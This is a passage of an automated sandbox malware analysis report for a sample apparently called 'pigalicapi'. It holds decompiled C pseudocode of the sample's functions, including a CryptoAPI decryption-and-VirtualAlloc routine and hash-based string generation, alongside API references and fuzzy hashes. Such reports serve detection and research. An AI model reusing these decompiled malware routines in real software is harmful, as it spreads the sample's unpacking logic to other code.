                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040081F1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 142027497-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                          • Instruction ID: 586cb0610e47de0410656fb7eac1ad2d30ffe64d38e300cd8a2e1f05076280ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3551E7B5E00209AFEB14DF98D984BEEB7B5BB48304F14C158E905BB381D774AA40CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                          			E04005930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                          				void _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                          					E04007B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                          					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					_v56 = 0;
                                                                                                                                                                                                                                                                          					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                          						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                          						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                          						if(_v56 == 0) {
                                                                                                                                                                                                                                                                          							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04005938
                                                                                                                                                                                                                                                                          0x04005943
                                                                                                                                                                                                                                                                          0x04005971
                                                                                                                                                                                                                                                                          0x04005986
                                                                                                                                                                                                                                                                          0x04005988
                                                                                                                                                                                                                                                                          0x0400598a
                                                                                                                                                                                                                                                                          0x0400598b
                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                          0x040059c6
                                                                                                                                                                                                                                                                          0x040059d6
                                                                                                                                                                                                                                                                          0x040059dc
                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                          0x040059ee
                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                          0x040059fb

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 0400597E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CharUpper
                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                          • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                          • Opcode ID: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                          • Instruction ID: f69ee34caa0c5af81cf691572c0dafb25cbc9a5132ff2a0986e08936ddab1125
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7210C35A06108EBEF04CF98D984BDDB7B6FF85315F248569E804A7280D375AA45CF41
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04009400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v91;
                                                                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                                                                          				char _v220;
                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                          					_t56 = E04007B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                          					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                          					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                          					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                          						E04007D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                          						_t59 = E04008BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                          						_v40 = _t59;
                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v220;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                          						E04009650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                          						E04007D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                          						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                          						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                          						_v91 = 0;
                                                                                                                                                                                                                                                                          						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                          						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04009409
                                                                                                                                                                                                                                                                          0x04009414
                                                                                                                                                                                                                                                                          0x0400943d
                                                                                                                                                                                                                                                                          0x04009442
                                                                                                                                                                                                                                                                          0x04009451
                                                                                                                                                                                                                                                                          0x04009454
                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                          0x04009480
                                                                                                                                                                                                                                                                          0x0400949a
                                                                                                                                                                                                                                                                          0x0400949f
                                                                                                                                                                                                                                                                          0x040094a2
                                                                                                                                                                                                                                                                          0x040094a9
                                                                                                                                                                                                                                                                          0x040094bf
                                                                                                                                                                                                                                                                          0x040094ab
                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                          0x040094d1
                                                                                                                                                                                                                                                                          0x040094ed
                                                                                                                                                                                                                                                                          0x040094fd
                                                                                                                                                                                                                                                                          0x04009502
                                                                                                                                                                                                                                                                          0x04009513
                                                                                                                                                                                                                                                                          0x04009519
                                                                                                                                                                                                                                                                          0x04009521
                                                                                                                                                                                                                                                                          0x04009533
                                                                                                                                                                                                                                                                          0x0400953c
                                                                                                                                                                                                                                                                          0x04009545
                                                                                                                                                                                                                                                                          0x04009460
                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                          0x04009553

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                          • Instruction ID: bc5be7810042b5ebbd7ddf8470aca826c8a0736d185973949ab2100ea4ccd4f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 564119B1D00208EBEB44DFD4C881BEEBBB5EF58308F10C15AD515BB281E774AA85CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 1000228B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$HugeRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 100728148-0
                                                                                                                                                                                                                                                                          • Opcode ID: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                          • Instruction ID: 133c763f371e93ed1e981491a31024dabb451d2fe405ffdb26697d1a1c2a5393
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3301C975A01149EFEB04DF94C985B9EBBB5EF48354F208298E909AB255C734EF40DBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 23%
                                                                                                                                                                                                                                                                          			E0040126C() {
                                                                                                                                                                                                                                                                          				int _t4;
                                                                                                                                                                                                                                                                          				intOrPtr* _t5;
                                                                                                                                                                                                                                                                          				intOrPtr* _t8;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				 *_t8 = 1;
                                                                                                                                                                                                                                                                          				__set_app_type(??);
                                                                                                                                                                                                                                                                          				E00401000();
                                                                                                                                                                                                                                                                          				_t5 = _t8;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t8 - 0x18)) = 2;
                                                                                                                                                                                                                                                                          				__set_app_type(_t4); // executed
                                                                                                                                                                                                                                                                          				E00401000(); // executed
                                                                                                                                                                                                                                                                          				_push(_t5);
                                                                                                                                                                                                                                                                          				goto __eax;
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x00401272
                                                                                                                                                                                                                                                                          0x00401279
                                                                                                                                                                                                                                                                          0x0040127f
                                                                                                                                                                                                                                                                          0x00401285
                                                                                                                                                                                                                                                                          0x0040128a
                                                                                                                                                                                                                                                                          0x00401291
                                                                                                                                                                                                                                                                          0x00401297
                                                                                                                                                                                                                                                                          0x0040129c
                                                                                                                                                                                                                                                                          0x004012a8

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 00401291
                                                                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 00401279
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040129C), ref: 00401033
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __getmainargs.MSVCRT ref: 00401070
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__fmode.MSVCRT ref: 0040107E
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__environ.MSVCRT ref: 00401098
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _cexit.MSVCRT ref: 004010BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: ExitProcess.KERNEL32 ref: 004010C3
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010F1
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 00401105
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _setmode$__set_app_type$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2043081007-0
                                                                                                                                                                                                                                                                          • Opcode ID: 95079076a23dd48875e793aac924bfe356b74353773b9bec2b3be70d01421b75
                                                                                                                                                                                                                                                                          • Instruction ID: 7cda7d837e108511d0981a2c678aee1b3234257573440c6a0797aaf790408f0b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95079076a23dd48875e793aac924bfe356b74353773b9bec2b3be70d01421b75
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD0123400820957C2003BB9DE0B70C7AEC5700346F81057CE4C5762A6DA7464554BEF
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040097A0(long _a4) {
                                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                                                                          0x040097b0
                                                                                                                                                                                                                                                                          0x040097b7

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                          • Opcode ID: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                          • Instruction ID: 51615621b5a1f832d01dc3b7a4cc229a82638b6a1205cca077e68d01418531cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C09B71144308ABE6449FD8E80DD95375DE748601F004111B70DD6141CB7CAD84C762
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                          • Instruction ID: 8f4ecb97985d5e8621b4f5fb532634e6274162181c58748ea6569eeff33a15e4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6418574A04109AFEB44CF44D494BEAB7B2FB88394F24C15AEC195B359D775EE82CB80
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                          • Opcode ID: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                          • Instruction ID: e5a886dd6f7ca33b6e05a63634625ffd61cc9a463d586fd81315a615fd3f2724
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBD09274A0620CEBDB10DBA9D948A8EB7FDEB08291F108598E90997204DA31AF409B90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 00401291
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040129C), ref: 00401033
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __getmainargs.MSVCRT ref: 00401070
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__fmode.MSVCRT ref: 0040107E
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__environ.MSVCRT ref: 00401098
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _cexit.MSVCRT ref: 004010BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: ExitProcess.KERNEL32 ref: 004010C3
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010F1
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 00401105
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.558505777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558382730.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558681103.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.558864837.0000000000406000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode__set_app_type_cexit
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 250851222-0
                                                                                                                                                                                                                                                                          • Opcode ID: abc5d16dfd36cc051d66f1b0a71e802486b709e19d00ad8df8ac84728067cb69
                                                                                                                                                                                                                                                                          • Instruction ID: 96c7857dd54b44c3e5074d738f37285bc9a5d07ca86cb9ffb3dbd1875c70a5b8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abc5d16dfd36cc051d66f1b0a71e802486b709e19d00ad8df8ac84728067cb69
